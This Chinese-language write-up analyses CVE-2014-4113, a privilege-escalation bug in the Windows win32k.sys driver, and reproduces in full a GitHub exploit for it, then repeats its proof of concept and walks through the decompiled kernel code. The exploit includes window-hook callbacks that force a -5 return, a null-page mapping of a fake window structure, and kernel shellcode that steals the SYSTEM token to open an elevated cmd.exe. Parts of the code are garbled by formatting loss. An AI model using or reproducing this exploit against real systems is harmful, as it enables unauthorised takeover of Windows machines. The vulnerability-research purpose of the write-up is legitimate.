一、漏洞简述 Microsoft Windows下的 win32k.sys是Windows子系统的内核部分,是一个内核模式设备驱动程序,它包含有窗口管理器、后者控制窗口显示和管理屏幕输出等。如果Windows内核模式驱动程序不正确地处理内存中的对象,则存在一个特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。攻击者随后可安装程序;查看、更改或删除数据;或者创建拥有完全管理权限的新帐户。其中CVE-2014-4113就是Win32k.sys中的一个漏洞,该漏洞的根本问题是函数xxxMNFindWindowFromPoint的返回值验证不正确。xxxMNFindWindowFromPoint函数执行后返回win32k!tagWND的地址结构或错误代码-1,-5。在该函数后面将调用函数xxxSendMessage,xxxSendMessage把xxxMNFindWindowFromPoint的返回值作为参数传递。当xxxMNFindWindowFromPoint返回win32k!tagWND地址的时候程序正常执行,但当返回-1,-5的时候传递给xxxSendMessage将造成蓝屏。

二、环境准备 系统版本


三、漏洞验证 这是一个提权漏洞,在GitHub上找的exp如下:

#include #include #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

typedef NTSTATUS (WINAPI* My_NtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID* BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect );

My_NtAllocateVirtualMemory NtAllocateVirtualMemory = NULL;

//Destroys the menu and then returns -5, this will be passed to xxxSendMessage which will then use it as a pointer. LRESULT CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) { printf("[+] Callback two called.\n"); EndMenu(); return -5; }

LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) { printf("[+] Callback one called.\n"); /* lParam is a pointer to a CWPSTRUCT which is defined as: typedef struct tagCWPSTRUCT { LPARAM lParam; WPARAM wParam; UINT message; HWND hwnd; } CWPSTRUCT, PCWPSTRUCT, LPCWPSTRUCT; / //lparam+8 is the message sent to the window, here we are checking for the message which is sent to a window when the function xxxMNFindWindowFromPoint is called if ((DWORD)(lParam + 8) == 0x1EB) { if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) { //lparam+12 is a Window Handle pointing to the window - here we are setting its callback to be our second one SetWindowLongA((HWND*)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo); } } return CallNextHookEx(0, code, wParam, lParam); }

/* LRESULT WINAPI DefWindowProc( In HWND hWnd, In UINT Msg, In WPARAM wParam, In LPARAM lParam ); hWnd => Handle of the Window the event was triggered on Msg => Message, the event that has occurred, this could be that window has moved, has been minimized, clicked on etc wParam, lParam => extra information depending on the msg recieved. / LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { / Wait until the window is idle and then send the messages needed to 'click' on the submenu to trigger the bug */ printf("[+] WindProc called with message=%d\n", msg); if (msg == WM_ENTERIDLE) { PostMessageA(hwnd, WM_KEYDOWN, VK_DOWN, 0); PostMessageA(hwnd, WM_KEYDOWN, VK_RIGHT, 0); PostMessageA(hwnd, WM_LBUTTONDOWN, 0, 0); } //Just pass any other messages to the default window procedure return DefWindowProc(hwnd, msg, wParam, lParam); }

VOID Poc() { /* typedef struct tagWNDCLASS { UINT style; WNDPROC lpfnWndProc; int cbClsExtra; int cbWndExtra; HINSTANCE hInstance; HICON hIcon; HCURSOR hCursor; HBRUSH hbrBackground; LPCTSTR lpszMenuName; LPCTSTR lpszClassName; } WNDCLASS, *PWNDCLASS; We don't care about any of the style information but we set any needed values below. */ WNDCLASSA wnd_class = { 0 }; //Our custome WndProc handler, inspects any window messages before passing then onto the default handler wnd_class.lpfnWndProc = WndProc; //Returns a handle to the executable that has the name passed to it, passing NULL means it returns a handle to this executable wnd_class.hInstance = GetModuleHandle(NULL); //Random classname - we reference this later when creating a Window of this class wnd_class.lpszClassName = "abcde";

//Registers the class in the global scope so it can be refered too later.
ATOM tmp = RegisterClassA(&wnd_class);
if (tmp == NULL) {
   printf("[+] Failed to register window class.\n");

/* Does what it says on the tin..
HWND WINAPI CreateWindow(
_In_opt_ LPCTSTR   lpClassName, => The name of the Window class to be created, in this case the class we just registered
_In_opt_ LPCTSTR   lpWindowName, => The name to give the window, we don't need to give it a name.
_In_     DWORD     dwStyle, => Style options for the window, here
_In_     int       x, => x position to create the window,this time the left edge
_In_     int       y, => y position to create the window, this time the top edge
_In_     int       nWidth, => Width of the window to create, randomly chosen value
_In_     int       nHeight, => Height of the to create, randomly chosen value
_In_opt_ HWND      hWndParent, => A handle to the parent window, this is our only window so NULL
_In_opt_ HMENU     hMenu, => A handle to a menu or sub window to attach to the window, we havent created any yet.
_In_opt_ HINSTANCE hInstance, => A handle to the module the window should be associated with, for us this executable
_In_opt_ LPVOID    lpParam => A pointer to data to be passed to the Window with the WM_CREATE message on creation, NULL for us as we don't wish to pass anything.
HWND main_wnd = CreateWindowA(

if (main_wnd == NULL) {
   printf("[+] Failed to create window instance.\n");

//Creates an empty popup menu
HMENU MenuOne = CreatePopupMenu();

if (MenuOne == NULL) {
   printf("[+] Failed to create popup menu one.\n");

/*Menu properties to apply to the empty menu we just created
typedef struct tagMENUITEMINFO {
UINT      cbSize;
UINT      fMask;
UINT      fType;
UINT      fState;
UINT      wID;
HMENU     hSubMenu;
HBITMAP   hbmpChecked;
HBITMAP   hbmpUnchecked;
ULONG_PTR dwItemData;
LPTSTR    dwTypeData;
UINT      cch;
HBITMAP   hbmpItem;
MENUITEMINFOA MenuOneInfo = { 0 };
//Default size
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
//Selects what properties to retrieve or set when GetMenuItemInfo/SetMenuItemInfo are called, in this case only dwTypeData which the contents of the menu item.
MenuOneInfo.fMask = MIIM_STRING;
/*Inserts a new menu at the specified position
BOOL WINAPI InsertMenuItem(
_In_ HMENU           hMenu, => Handle to the menu the new item should be inserted into, in our case the empty menu we just created
_In_ UINT            uItem, => it should item 0 in the menu
_In_ BOOL            fByPosition, => Decided whether uItem is a position or an identifier, in this case its a position. If FALSE it makes uItem an identifier
_In_ LPCMENUITEMINFO lpmii => A pointer to the MENUITEMINFO structure that contains the menu item details.
BOOL insertMenuItem = InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo);

if (!insertMenuItem) {
   printf("[+] Failed to insert popup menu one.\n");

HMENU MenuTwo = CreatePopupMenu();

if (MenuTwo == NULL) {
   printf("[+] Failed to create menu two.\n");

MENUITEMINFOA MenuTwoInfo = { 0 };
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
//On this window hSubMenu should be included in Get/SetMenuItemInfo
//The menu is a sub menu of the first menu
MenuTwoInfo.hSubMenu = MenuOne;
//The contents of the menu item - in this case nothing
MenuTwoInfo.dwTypeData = (LPSTR)"";
//The length of the menu item text - in the case 1 for just a single NULL byte
MenuTwoInfo.cch = 1;
insertMenuItem = InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo);

if (!insertMenuItem) {
   printf("[+] Failed to insert second pop-up menu.\n");

HHOOK WINAPI SetWindowsHookEx(
_In_ int       idHook, => The type of hook we want to create, in this case WH_CALLWNDPROC which means that the callback will be passed any window messages before the system sends them to the destination window procedure.
_In_ HOOKPROC  lpfn, => The callback that should be called when triggered
_In_ HINSTANCE hMod, => If the hook functions is in a dll we pass a handle to the dll here, not needed in this case.
_In_ DWORD     dwThreadId => The thread which the callback should be triggered in, we want it to be our current thread.
HHOOK setWindowsHook = SetWindowsHookExA(

if (setWindowsHook == NULL) {
   printf("[+] Failed to insert call back one.\n");

/* Displays a menu and tracks interactions with it.
BOOL WINAPI TrackPopupMenu(
_In_           HMENU hMenu,
_In_           UINT  uFlags,
_In_           int   x,
_In_           int   y,
_In_           int   nReserved,
_In_           HWND  hWnd,
_In_opt_ const RECT  *prcRect
   MenuTwo, //Handle to the menu we want to display, for us its the submenu we just created.
   0,     //Options on how the menu is aligned, what clicks are allowed etc, we don't care.
   0,     //Horizontal position - left hand side
   0,     //Vertical position - Top edge
   0,     //Reserved field, has to be 0
   main_wnd,//Handle to the Window which owns the menu
   NULL   //This value is always ignored...



int __stdcall ShellCode(int parameter1, int parameter2, int parameter3, int parameter4) { _asm { pushad mov eax, fs: [124h] // Find the _KTHREAD structure for the current thread mov eax, [eax + 0x50] // Find the _EPROCESS structure mov ecx, eax mov edx, 4 // edx = system PID(4)

   // The loop is to get the _EPROCESS of the system
   find_sys_pid :
   mov eax, [eax + 0xb8] // Find the process activity list
   sub eax, 0xb8        // List traversal
   cmp[eax + 0xb4], edx    // Determine whether it is SYSTEM based on PID
   jnz find_sys_pid

   // Replace the Token
   mov edx, [eax + 0xf8]
   mov[ecx + 0xf8], edx
return 0;


static VOID CreateCmd() { STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi = { 0 }; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOW; WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi); if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); }

DWORD __stdcall ptiCurrent() { __asm { mov eax, fs:18h //eax pointer to TEB mov eax, [eax + 40h] //get pointer to Win32ThreadInfo } }

VOID init() { (FARPROC)&NtAllocateVirtualMemory = GetProcAddress( GetModuleHandleW(L"ntdll"), "NtAllocateVirtualMemory");

if (NtAllocateVirtualMemory == NULL)
   printf("[+] Failed to get function NtAllocateVirtualMemory!!!\n");

PVOID Zero_addr = (PVOID)1;
SIZE_T RegionSize = 0x1000;

printf("[+] Started to alloc zero page...\n");
if (!NT_SUCCESS(NtAllocateVirtualMemory(
   PAGE_READWRITE)) || Zero_addr != NULL)
   printf("[+] Failed to alloc zero page!\n");

printf("[+] Success to alloc zero page...\n");

*(DWORD*)(0x3) = (DWORD)ptiCurrent();
*(DWORD*)(0x11) = (DWORD)4;
*(DWORD*)(0x5b) = (DWORD)&ShellCode;


int main() { init();




return 0;







四、漏洞分析 从POC开始分析吧,代码如下:

#include #include

//Destroys the menu and then returns -5, this will be passed to xxxSendMessage which will then use it as a pointer. LRESULT CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) { printf("[+] Callback two called.\n"); EndMenu(); return -5; }

LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) { printf("[+] Callback one called.\n"); /* lParam is a pointer to a CWPSTRUCT which is defined as: typedef struct tagCWPSTRUCT { LPARAM lParam; WPARAM wParam; UINT message; HWND hwnd; } CWPSTRUCT, PCWPSTRUCT, LPCWPSTRUCT; / //lparam+8 is the message sent to the window, here we are checking for the message which is sent to a window when the function xxxMNFindWindowFromPoint is called if ((DWORD)(lParam + 8) == 0x1EB) { if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) { //lparam+12 is a Window Handle pointing to the window - here we are setting its callback to be our second one SetWindowLongA((HWND*)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo); } } return CallNextHookEx(0, code, wParam, lParam); }

/* LRESULT WINAPI DefWindowProc( In HWND hWnd, In UINT Msg, In WPARAM wParam, In LPARAM lParam ); hWnd => Handle of the Window the event was triggered on Msg => Message, the event that has occurred, this could be that window has moved, has been minimized, clicked on etc wParam, lParam => extra information depending on the msg recieved. / LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) { / Wait until the window is idle and then send the messages needed to 'click' on the submenu to trigger the bug */ printf("[+] WindProc called with message=%d\n", msg); if (msg == WM_ENTERIDLE) { PostMessageA(hwnd, WM_KEYDOWN, VK_DOWN, 0); PostMessageA(hwnd, WM_KEYDOWN, VK_RIGHT, 0); PostMessageA(hwnd, WM_LBUTTONDOWN, 0, 0); } //Just pass any other messages to the default window procedure return DefWindowProc(hwnd, msg, wParam, lParam); }

VOID Poc() { /* typedef struct tagWNDCLASS { UINT style; WNDPROC lpfnWndProc; int cbClsExtra; int cbWndExtra; HINSTANCE hInstance; HICON hIcon; HCURSOR hCursor; HBRUSH hbrBackground; LPCTSTR lpszMenuName; LPCTSTR lpszClassName; } WNDCLASS, *PWNDCLASS; We don't care about any of the style information but we set any needed values below. */ WNDCLASSA wnd_class = { 0 }; //Our custome WndProc handler, inspects any window messages before passing then onto the default handler wnd_class.lpfnWndProc = WndProc; //Returns a handle to the executable that has the name passed to it, passing NULL means it returns a handle to this executable wnd_class.hInstance = GetModuleHandle(NULL); //Random classname - we reference this later when creating a Window of this class wnd_class.lpszClassName = "abcde";

//Registers the class in the global scope so it can be refered too later.
ATOM tmp = RegisterClassA(&wnd_class);
if (tmp == NULL) {
   printf("[+] Failed to register window class.\n");

/* Does what it says on the tin..
HWND WINAPI CreateWindow(
_In_opt_ LPCTSTR   lpClassName, => The name of the Window class to be created, in this case the class we just registered
_In_opt_ LPCTSTR   lpWindowName, => The name to give the window, we don't need to give it a name.
_In_     DWORD     dwStyle, => Style options for the window, here
_In_     int       x, => x position to create the window,this time the left edge
_In_     int       y, => y position to create the window, this time the top edge
_In_     int       nWidth, => Width of the window to create, randomly chosen value
_In_     int       nHeight, => Height of the to create, randomly chosen value
_In_opt_ HWND      hWndParent, => A handle to the parent window, this is our only window so NULL
_In_opt_ HMENU     hMenu, => A handle to a menu or sub window to attach to the window, we havent created any yet.
_In_opt_ HINSTANCE hInstance, => A handle to the module the window should be associated with, for us this executable
_In_opt_ LPVOID    lpParam => A pointer to data to be passed to the Window with the WM_CREATE message on creation, NULL for us as we don't wish to pass anything.
HWND main_wnd = CreateWindowA(

if (main_wnd == NULL) {
   printf("[+] Failed to create window instance.\n");

//Creates an empty popup menu
HMENU MenuOne = CreatePopupMenu();

if (MenuOne == NULL) {
   printf("[+] Failed to create popup menu one.\n");

/*Menu properties to apply to the empty menu we just created
typedef struct tagMENUITEMINFO {
UINT      cbSize;
UINT      fMask;
UINT      fType;
UINT      fState;
UINT      wID;
HMENU     hSubMenu;
HBITMAP   hbmpChecked;
HBITMAP   hbmpUnchecked;
ULONG_PTR dwItemData;
LPTSTR    dwTypeData;
UINT      cch;
HBITMAP   hbmpItem;
MENUITEMINFOA MenuOneInfo = { 0 };
//Default size
MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
//Selects what properties to retrieve or set when GetMenuItemInfo/SetMenuItemInfo are called, in this case only dwTypeData which the contents of the menu item.
MenuOneInfo.fMask = MIIM_STRING;
/*Inserts a new menu at the specified position
BOOL WINAPI InsertMenuItem(
_In_ HMENU           hMenu, => Handle to the menu the new item should be inserted into, in our case the empty menu we just created
_In_ UINT            uItem, => it should item 0 in the menu
_In_ BOOL            fByPosition, => Decided whether uItem is a position or an identifier, in this case its a position. If FALSE it makes uItem an identifier
_In_ LPCMENUITEMINFO lpmii => A pointer to the MENUITEMINFO structure that contains the menu item details.
BOOL insertMenuItem = InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo);

if (!insertMenuItem) {
   printf("[+] Failed to insert popup menu one.\n");

HMENU MenuTwo = CreatePopupMenu();

if (MenuTwo == NULL) {
   printf("[+] Failed to create menu two.\n");

MENUITEMINFOA MenuTwoInfo = { 0 };
MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
//On this window hSubMenu should be included in Get/SetMenuItemInfo
//The menu is a sub menu of the first menu
MenuTwoInfo.hSubMenu = MenuOne;
//The contents of the menu item - in this case nothing
MenuTwoInfo.dwTypeData = (LPSTR)"";
//The length of the menu item text - in the case 1 for just a single NULL byte
MenuTwoInfo.cch = 1;
insertMenuItem = InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo);

if (!insertMenuItem) {
   printf("[+] Failed to insert second pop-up menu.\n");

HHOOK WINAPI SetWindowsHookEx(
_In_ int       idHook, => The type of hook we want to create, in this case WH_CALLWNDPROC which means that the callback will be passed any window messages before the system sends them to the destination window procedure.
_In_ HOOKPROC  lpfn, => The callback that should be called when triggered
_In_ HINSTANCE hMod, => If the hook functions is in a dll we pass a handle to the dll here, not needed in this case.
_In_ DWORD     dwThreadId => The thread which the callback should be triggered in, we want it to be our current thread.
HHOOK setWindowsHook = SetWindowsHookExA(

if (setWindowsHook == NULL) {
   printf("[+] Failed to insert call back one.\n");

/* Displays a menu and tracks interactions with it.
BOOL WINAPI TrackPopupMenu(
_In_           HMENU hMenu,
_In_           UINT  uFlags,
_In_           int   x,
_In_           int   y,
_In_           int   nReserved,
_In_           HWND  hWnd,
_In_opt_ const RECT  *prcRect
   MenuTwo, //Handle to the menu we want to display, for us its the submenu we just created.
   0,     //Options on how the menu is aligned, what clicks are allowed etc, we don't care.
   0,     //Horizontal position - left hand side
   0,     //Vertical position - Top edge
   0,     //Reserved field, has to be 0
   main_wnd,//Handle to the Window which owns the menu
   NULL   //This value is always ignored...


int main() { Poc(); return 0; }

编译成exe拖入虚拟机运行,打开双击调试: 4.png

卡在这里,看箭头位置: 5.png





通过xxxHandleMenuMessages+0x582的地址,F5到此处: 8.png

LABEL_13: v12 = a2; *(_DWORD *)(a2 + 16) = -1; *(_DWORD *)(a2 + 8) = (signed __int16)v7; *(_DWORD *)(a2 + 12) = SHIWORD(v7); v13 = xxxMNFindWindowFromPoint((WCHAR)v3, (int)&UnicodeString, v7); v52 = IsMFMWFPWindow(v13); if ( v52 ) { v46 = *((_DWORD *)gptiCurrent + 45); *((_DWORD )gptiCurrent + 45) = &v46; v47 = v13; if ( v13 ) ++(_DWORD *)(v13 + 4); } if ( *(_DWORD *)(v12 + 4) & 0x400 ) { *(_DWORD *)(v12 + 36) = *(_DWORD *)(v12 + 8); *(_DWORD *)(v12 + 40) = *(_DWORD *)(v12 + 12); *(_DWORD *)(v12 + 48) = UnicodeString; LockMFMWFPWindow(v12 + 44, v13); } if ( *(_DWORD *)(v12 + 4) & 0x500 ) *(_DWORD *)(v12 + 52) = ((v50 & 2) != 0) + 1; if ( !v13 && !UnicodeString ) goto LABEL_22; if ( *(_BYTE )v3 & 2 && v13 == -5 ) { xxxMNSwitchToAlternateMenu(v3); v13 = -1; } if ( v13 == -1 ) xxxMNButtonDown(v3, v12, UnicodeString, 1); else xxxSendMessage((PVOID)v13, -19, UnicodeString, 0); if ( !((_DWORD )(v12 + 4) & 0x100) ) xxxMNRemoveMessage((_DWORD *)(a1 + 4), 516);

可以看到esi的值主要来源于 v13 = xxxMNFindWindowFromPoint((WCHAR)v3, (int)&UnicodeString, v7); v52 = IsMFMWFPWindow(v13):此函数判断值是否是-5和-1,不是的话返回1:

BOOL __stdcall IsMFMWFPWindow(int a1) { return a1 && a1 != -5 && a1 != -1; }

而如果要执行xxxSendMessage这个函数,就需要让v13的值等于-5(FFFFFFFB),我们看xxxMNFindWindowFromPoint这个函数: 9.png


图片 1.png

这里判断呢,就是发送消息是1ED这里,然后判断是不是-1或者-5就跳过if,所以这里需要跳过if,否则返回值会重新赋值,然后-1的话触发不了漏洞,只能-5,也就是HOOK这里,让这个返回值-5,触发漏洞。 接下来根据POC简单梳理一下过程: 调用了TrackPopupMenu函数触发漏洞,然后调用内核函数win32k!xxxTrackPopupMenuEx,最后调用最终会调用win32k! xxxMNLoop函数,然后就跟进win32k!xxxHandleMenuMessages函数,随后就是我们分析的情况。触发漏洞需要让xxxMNFindWindowFromPoint返回值=-5;

五、漏洞利用 在POC中,对于消息号为0x1EB的消息,HOOK函数返回了0xFFFFFFFB,而程序把该值作为win32k!tagWND结构处理,导致后边把0xFFFFFFFB作为win32k!ptagWND结构传给win32k! xxxSendMessage。在win32k! xxxSendMessage中会调用win32k!xxxSendMessageTimeout,在win32k!xxxSendMessageTimeout中当把0xFFFFFFFB作为win32k!tagWND结构处理时,会调用ptagWND+0x60处的函数,也就是call [0xFFFFFFB+0x60],在xxxSendMessageTimeout中,即call [0x5B]。 如果在0x5B位置布置shellcode,就可以完成漏洞利用,下面还要注意一个点,是xxxSendMessageTimeout函数内部的俩个验证,所以我们需要布局0x3,0x11位置: 10.png 通过函数ZwAllocateVirtualMemory申请0页内存空间,在该空间建立一个畸形的win32k!tagWND结构的映射页,使得在内核能正确地验证。并将shellcode地址布置在0x5B。而shellcode就是创建cmd,把进程Token换成system的Token值。至于钩子为什么使用SetWindowLongA设置了一次窗口函数,因为只有在窗口处理函数线程的上下文空间中调用EndMenu函数才有意义。补充一点exp调用sendMessage函数是分同步异步,这里不再多说,可以看这里:https://www.anquanke.com/post/id/84869